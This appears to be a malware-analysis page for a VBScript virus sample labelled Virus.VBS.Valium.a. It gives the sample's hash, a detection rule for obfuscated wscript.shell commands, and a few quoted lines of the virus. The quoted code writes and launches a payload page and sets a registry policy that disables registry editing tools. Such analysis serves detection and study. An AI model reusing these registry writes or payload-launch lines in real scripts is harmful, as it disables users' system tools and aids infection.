Suspicious 75% Download

Virus.VBS.Valium.a

Detects obfuscated wscript.shell commands
SHA-2565e225649f1b22df45eb21cfeeac0849171af2b254d09676eac202d0d57c100a7
MaleculeTh

Evidence

Detects obfuscated wscript.shell commands lines 138–145
138:115… infected with Valium virus by psychologic/redline</b></p>"
139 payload.writeline "</body></html>"
140 payload.close
141 CreateObject("Wscript.shell").run "C:\payload.html"
142end if
143
144CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
145createobject("Wscript.shell").regwrite "HKEY_CLASSES_ROOT\Directory\She …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.